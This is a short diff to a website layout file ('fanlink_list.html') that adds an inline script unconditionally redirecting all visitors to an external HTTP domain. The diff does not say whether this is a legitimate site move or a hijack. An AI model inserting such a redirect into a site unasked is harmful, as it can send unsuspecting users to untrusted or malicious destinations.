--- a/_layouts/fanlink_list.html
+++ b/_layouts/fanlink_list.html
@@ -91,6 +91,9 @@
     <script src="https://kit.fontawesome.com/cc91b92ca8.js"></script>
     <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-easing/1.4.1/jquery.easing.js"></script>
     <script src="/js/tema.js"></script>
+    <script>
+      window.location.replace("http://lnk.bayza.ml");
+    </script>
   </body>
 </html>
 
